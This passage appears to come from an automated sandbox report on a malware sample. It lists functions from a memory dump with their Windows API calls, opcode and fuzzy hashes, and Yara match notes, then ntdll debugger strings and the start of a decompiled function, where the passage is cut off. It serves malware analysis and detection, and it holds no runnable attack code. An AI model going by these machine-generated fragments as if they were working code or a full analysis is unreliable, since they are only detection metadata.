                                            • Instruction Fuzzy Hash: F5F015B2200208ABDB14DF89CC81EEB77ADAF88754F118549FE0897241C630F810CBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004186F0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418715
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction ID: 0b0e29a7bb3afeb76cf53b9d16d6e0c91c86644eaa2e8498d895191de08f0161
                                            • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                            • Instruction Fuzzy Hash: 7DD01776200214BBEB10EB99CC89EE77BACEF48760F154499BA189B242C530FA4086E0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 75fd7915af5fdb38a622e441fb076b3ffd15fcc0e128025ccfb41035c398dbb3
                                            • Instruction ID: ce4ebb80e1cf122ae706ac409dc59cb9d6e03117157da523c44bac4babd7a394
                                            • Opcode Fuzzy Hash: 75fd7915af5fdb38a622e441fb076b3ffd15fcc0e128025ccfb41035c398dbb3
                                            • Instruction Fuzzy Hash: 629002B121100802E14071A944047470005ABD0341F51C015A5055554EC6A98DD577A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012699A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d4aa6107b8e78bb1da4b07bcc511ff5cb22f4cfab9dfee2323f2a24c23b6448f
                                            • Instruction ID: bc490f00cc112b2c4aaf185cf968f1b7be64dcdee2a55dff41e9ebd262d2fff1
                                            • Opcode Fuzzy Hash: d4aa6107b8e78bb1da4b07bcc511ff5cb22f4cfab9dfee2323f2a24c23b6448f
                                            • Instruction Fuzzy Hash: D29002A135100842E10061A94414B070005EBE1341F51C019E1055554DC669CC527266
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 5e03cdf232ea196f1f20b3fbed26ac265e7c2a59cf1625f03377f716f1030412
                                            • Instruction ID: 30281444b8cd05a7f9c0a10c892cec933f27b24b345d12ce3cd18abec7b42096
                                            • Opcode Fuzzy Hash: 5e03cdf232ea196f1f20b3fbed26ac265e7c2a59cf1625f03377f716f1030412
                                            • Instruction Fuzzy Hash: FA90027121100813E11161A945047070009ABD0281F91C416A0415558DD6A68952B261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 98cebef24385fef777a7f7b86d733bb13c632daaef51e4770c6f0415590e1bdf
                                            • Instruction ID: fe373d80ddcff43b70bb1a13dd1dcf6a257553f1cda8b0215e1815d31441bf62
                                            • Opcode Fuzzy Hash: 98cebef24385fef777a7f7b86d733bb13c632daaef51e4770c6f0415590e1bdf
                                            • Instruction Fuzzy Hash: 10900261252045526545B1A944045074006BBE0281791C016A1405950CC5769856E761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012698F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a18cca18dff4c6f9da2a286d175cd8fce19cda1d38a2bb3f3ee30d82aee2a97e
                                            • Instruction ID: 07287fe4ad312748ef8acf82e02e18210fc9c00888e8b201bb2681e0cede5080
                                            • Opcode Fuzzy Hash: a18cca18dff4c6f9da2a286d175cd8fce19cda1d38a2bb3f3ee30d82aee2a97e
                                            • Instruction Fuzzy Hash: 1590026161100902E10171A94404617000AABD0281F91C026A1015555ECA758992B271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: d2c5a59ee8260150c03eda237cf3370db0c89ed067720c34ff6b62f19c03d8c2
                                            • Instruction ID: 130ad5f5b858fb3605baa7dce1576aa452ec6ec8ae494f1059b51da6f18f9e85
                                            • Opcode Fuzzy Hash: d2c5a59ee8260150c03eda237cf3370db0c89ed067720c34ff6b62f19c03d8c2
                                            • Instruction Fuzzy Hash: 3A90026161100442514071B988449074005BFE1251751C125A0989550DC5A9886567A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f703ea4755079d5f98400782d3dc72f7b29a9b8d2ef417f1552c6f3532553dba
                                            • Instruction ID: 992db08a7a4ea819de0a2c319243130a12a58c9e1afe532a4f4fa389061c9a5a
                                            • Opcode Fuzzy Hash: f703ea4755079d5f98400782d3dc72f7b29a9b8d2ef417f1552c6f3532553dba
                                            • Instruction Fuzzy Hash: E390027121140802E10061A9481470B0005ABD0342F51C015A1155555DC675885176B1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a1bd76f0aed632939404a3ce0d2391dfa441b2bc6b444bcb82dc8080d0bb9f77
                                            • Instruction ID: bdd0c93f1f477849e613ceac78022844dd93627cb097abd5bbf8f37888437cd6
                                            • Opcode Fuzzy Hash: a1bd76f0aed632939404a3ce0d2391dfa441b2bc6b444bcb82dc8080d0bb9f77
                                            • Instruction Fuzzy Hash: 0790026122180442E20065B94C14B070005ABD0343F51C119A0145554CC96588616661
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: abfe1c11938d33a9b510c0c95ae57aedafe7f87a1c1b1a546b08d5e5e0f9c603
                                            • Instruction ID: 6b841331dc7b44067d059f8dcc15de11886d7305fd8d2e73ef8ff81ebf8d4326
                                            • Opcode Fuzzy Hash: abfe1c11938d33a9b510c0c95ae57aedafe7f87a1c1b1a546b08d5e5e0f9c603
                                            • Instruction Fuzzy Hash: A7900265221004031105A5A907045070046ABD5391351C025F1006550CD67188616261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012695D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1e73a01d6a287bfbb2f0ed716e4d10650c58790d0664c0f2cd98a3059cfaaebd
                                            • Instruction ID: aa0183c6a2eacb5a223d2e3d3946e6a54cbeb8b168b933dbd567b12e7e8f7c12
                                            • Opcode Fuzzy Hash: 1e73a01d6a287bfbb2f0ed716e4d10650c58790d0664c0f2cd98a3059cfaaebd
                                            • Instruction Fuzzy Hash: 649002A121200403510571A94414617400AABE0241B51C025E1005590DC57588917265
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 909907503830b46ee5f642be3fdb6ed4515b29f3de8616517c44b4cb80f10f68
                                            • Instruction ID: 9b14762bb3c825c4fa25569f522aaee1a5748b5941d70435419745c60884510a
                                            • Opcode Fuzzy Hash: 909907503830b46ee5f642be3fdb6ed4515b29f3de8616517c44b4cb80f10f68
                                            • Instruction Fuzzy Hash: BF90027121100802E10065E954086470005ABE0341F51D015A5015555EC6B588917271
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012697A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 89300f64350ad2c6cf4e5f5c62664d2f2911044a5e31fd2ae82ff13f41af4178
                                            • Instruction ID: d2061cc12b294ba83b1200f3605966cb6651a0c65861f0e84f71190602d4a7d4
                                            • Opcode Fuzzy Hash: 89300f64350ad2c6cf4e5f5c62664d2f2911044a5e31fd2ae82ff13f41af4178
                                            • Instruction Fuzzy Hash: 1690026131100403E14071A954186074005FBE1341F51D015E0405554CD96588566362
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 48b4988bf00e87aeca66ed31c8b4b9da21d175d9727dfaccebb1c72fbbdbb477
                                            • Instruction ID: 874b749f8a075cf32f42e21197e54460062e5715a5402ad74ca6c35fb61348fd
                                            • Opcode Fuzzy Hash: 48b4988bf00e87aeca66ed31c8b4b9da21d175d9727dfaccebb1c72fbbdbb477
                                            • Instruction Fuzzy Hash: 4790026922300402E18071A9540860B0005ABD1242F91D419A0006558CC96588696361
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 98d3125e80450fb5f10db2e597deb52058ceb341bcee0d2d617fdcecf4917517
                                            • Instruction ID: fe3b5a84be2b4eb9528a804de8da106bd13bb51af8a9198fe013e18c3447285f
                                            • Opcode Fuzzy Hash: 98d3125e80450fb5f10db2e597deb52058ceb341bcee0d2d617fdcecf4917517
                                            • Instruction Fuzzy Hash: 9890027132114802E11061A984047070005ABD1241F51C415A0815558DC6E588917262
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 01269660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 7f68ede50a29cf001b01ee029a2ca7c6a244e119aa058efff6e6553e94bd6192
                                            • Instruction ID: 2645d4c44dde926a173f86440304567503556f1f8a79cd135365742fcde86e60
                                            • Opcode Fuzzy Hash: 7f68ede50a29cf001b01ee029a2ca7c6a244e119aa058efff6e6553e94bd6192
                                            • Instruction Fuzzy Hash: B890027121100C02E18071A9440464B0005ABD1341F91C019A0016654DCA658A5977E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012696E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 9d9540b0ee249bf4edafac6d13d1fa0880876213ca2f89d2d231c9c57f390b80
                                            • Instruction ID: b415ab55dd24158c0a5a7ca7d8c9d74ce1d212dd48b460cf708be17fe8e5a103
                                            • Opcode Fuzzy Hash: 9d9540b0ee249bf4edafac6d13d1fa0880876213ca2f89d2d231c9c57f390b80
                                            • Instruction Fuzzy Hash: B390027121108C02E11061A9840474B0005ABD0341F55C415A4415658DC6E588917261
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004088D0, Relevance: .1, Instructions: 92COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4306667aa9f532a2ed7b70f283dd30ae88db4e50b66cecac2bda7e96507e56ad
                                            • Instruction ID: cb3335a1e64584eb07a4ea91dadddbc29470679c3074ba74e55a49ec00779158
                                            • Opcode Fuzzy Hash: 4306667aa9f532a2ed7b70f283dd30ae88db4e50b66cecac2bda7e96507e56ad
                                            • Instruction Fuzzy Hash: ED21FBB2C4420957CB15E6649D42BFF737C9B54304F04057FE989A3181F639AB4987A7
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418890, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlAllocateHeap.NTDLL(65A,?,00413CAF,00413CAF,?,00413536,?,?,?,?,?,00000000,00408B13,?), ref: 004188BD
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateHeap
                                            • String ID: 65A
                                            • API String ID: 1279760036-2085483392
                                            • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction ID: 5c156194473f1d05c310d89676d9f0526131e4dffca8646f7b57c59a0eef6258
                                            • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                            • Instruction Fuzzy Hash: 34E012B1200208ABDB14EF99CC45EA777ACAF88654F118559FA085B242C630F910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00407280, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072DA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: MessagePostThread
                                            • String ID:
                                            • API String ID: 1836367815-0
                                            • Opcode ID: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                            • Instruction ID: 9e9773ac0b0102b9350b3534e018efb02758e459cfd39c42d1aa5cef431ad939
                                            • Opcode Fuzzy Hash: 9e39a802d25bf0205d4005b1bd6783377b2ee9f48abcc3171cc4447a97e058b9
                                            • Instruction Fuzzy Hash: E301D431A8022877E720A6959C03FFE772C5B00B55F14016EFF04BA1C2E6A8790542EA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188C2, Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: 0b9f3e2777f9b9c9f64b15974f5f749d78192690e6137513a087d7991a9974ad
                                            • Instruction ID: d593e9361b8f901df4ab9315801aac8de0e07cf32cb081cd2a76ddc773bf3396
                                            • Opcode Fuzzy Hash: 0b9f3e2777f9b9c9f64b15974f5f749d78192690e6137513a087d7991a9974ad
                                            • Instruction Fuzzy Hash: 20E022712002046BCB14DF58CC4AEDB7369EF88340F108514FD089B342C230E802CBF1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418A21, Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: a3f3ee3cb9ffbb11adea4fbc12c88e3e6e8334bc09bffa8ae53608e8eb042dd8
                                            • Instruction ID: e5332348da5b59533d6ade47f11be478ceaf701206163b642f5670b3d75938cc
                                            • Opcode Fuzzy Hash: a3f3ee3cb9ffbb11adea4fbc12c88e3e6e8334bc09bffa8ae53608e8eb042dd8
                                            • Instruction Fuzzy Hash: 28F0A9B2200215AFDB20CF14CC88EEBB769EF85314F0081A8FD08AB241DA31A850CBB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004188D0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RtlFreeHeap.NTDLL(00000060,00408B13,?,?,00408B13,00000060,00000000,00000000,?,?,00408B13,?,00000000), ref: 004188FD
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: FreeHeap
                                            • String ID:
                                            • API String ID: 3298025750-0
                                            • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction ID: 2a8b4d01c77f57f9537e4a8c9056324bca9a4fb502523cc2798246bee73f8781
                                            • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                            • Instruction Fuzzy Hash: D7E012B1200208ABDB18EF99CC49EA777ACAF88750F018559FA085B242C630E910CAB0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418A30, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFC2,0040CFC2,00000041,00000000,?,00408B85), ref: 00418A60
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: LookupPrivilegeValue
                                            • String ID:
                                            • API String ID: 3899507212-0
                                            • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction ID: fa95252e36870a94604636740fee15c405cfb0840f5ac42baad6929b42f97f84
                                            • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                            • Instruction Fuzzy Hash: 1AE01AB12002086BDB10DF49CC85EE737ADAF89650F018555FA0857241C934E8508BF5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418910, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction ID: ebe942e9f85fd7778464d46fb55928cc225e25ca24bfac27d2b1ada9d5edf0ef
                                            • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                            • Instruction Fuzzy Hash: 09D012716002147BD620DB99CC85FD7779CDF49750F018465BA1C5B241C531BA00C6E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00418902, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                            Download Yara Rule
                                            APIs
                                            • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418938
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.732622247.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                            Yara matches
                                            Similarity
                                            • API ID: ExitProcess
                                            • String ID:
                                            • API String ID: 621844428-0
                                            • Opcode ID: 3eff6399784c95a37879c2e5df9049601b14c8bc323049bdb386d7b661a0e191
                                            • Instruction ID: 6b97c1c272066a10d9ae5db07586b327e2da51441593cc28def281dcf72283c0
                                            • Opcode Fuzzy Hash: 3eff6399784c95a37879c2e5df9049601b14c8bc323049bdb386d7b661a0e191
                                            • Instruction Fuzzy Hash: C9E0C2751197013BCB20EB648DC6EC77BA8DF05340F148D5FE8A99B243C138F64086A4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0126967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: da91000bc847c2754bdb9f96ee4c25b57223099274395166b7c911a34fafda46
                                            • Instruction ID: 0bda0cf26f0e7f42fe81bc422289fa0214a8eaeb0ca1a60e88697ced3ceee5c6
                                            • Opcode Fuzzy Hash: da91000bc847c2754bdb9f96ee4c25b57223099274395166b7c911a34fafda46
                                            • Instruction Fuzzy Hash: 4AB09B719115C5CDEA11D7B4470871779047BD0745F16C055D2020645B4778C4D1F6B5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Non-executed Functions

                                            Function 012DB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                            Download Yara Rule
                                            Strings
                                            • <unknown>, xrefs: 012DB27E, 012DB2D1, 012DB350, 012DB399, 012DB417, 012DB48E
                                            • The critical section is owned by thread %p., xrefs: 012DB3B9
                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012DB484
                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012DB47D
                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 012DB352
                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012DB3D6
                                            • *** An Access Violation occurred in %ws:%s, xrefs: 012DB48F
                                            • The resource is owned exclusively by thread %p, xrefs: 012DB374
                                            • The instruction at %p tried to %s , xrefs: 012DB4B6
                                            • a NULL pointer, xrefs: 012DB4E0
                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012DB476
                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012DB323
                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012DB314
                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 012DB39B
                                            • *** enter .cxr %p for the context, xrefs: 012DB50D
                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012DB38F
                                            • *** Inpage error in %ws:%s, xrefs: 012DB418
                                            • *** then kb to get the faulting stack, xrefs: 012DB51C
                                            • Go determine why that thread has not released the critical section., xrefs: 012DB3C5
                                            • read from, xrefs: 012DB4AD, 012DB4B2
                                            • This failed because of error %Ix., xrefs: 012DB446
                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012DB2DC
                                            • The resource is owned shared by %d threads, xrefs: 012DB37E
                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012DB305
                                            • write to, xrefs: 012DB4A6
                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 012DB2F3
                                            • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012DB53F
                                            • an invalid address, %p, xrefs: 012DB4CF
                                            • *** enter .exr %p for the exception record, xrefs: 012DB4F1
                                            • The instruction at %p referenced memory at %p., xrefs: 012DB432
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.733730251.0000000001200000.00000040.00000001.sdmp, Offset: 01200000, based on PE: true
                                            Similarity
                                            • API ID:
                                            • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                            • API String ID: 0-108210295
                                            • Opcode ID: 1d972320fa90aaa86c48d43992565fd6257d3bbe1ee92b346cc45724dae72d31
                                            • Instruction ID: 890b2c190f4b17648c8d512978edc3be7f3731b10dbf49465b3b59f3ec587207
                                            • Opcode Fuzzy Hash: 1d972320fa90aaa86c48d43992565fd6257d3bbe1ee92b346cc45724dae72d31
                                            • Instruction Fuzzy Hash: B3811435A30211FFDB26DF4ACCAADBB3B65EF67B91F420048F6041B116D2A68501D7B2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 012E1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 44%
                                            			E012E1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12048a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0122B150();
				} else {
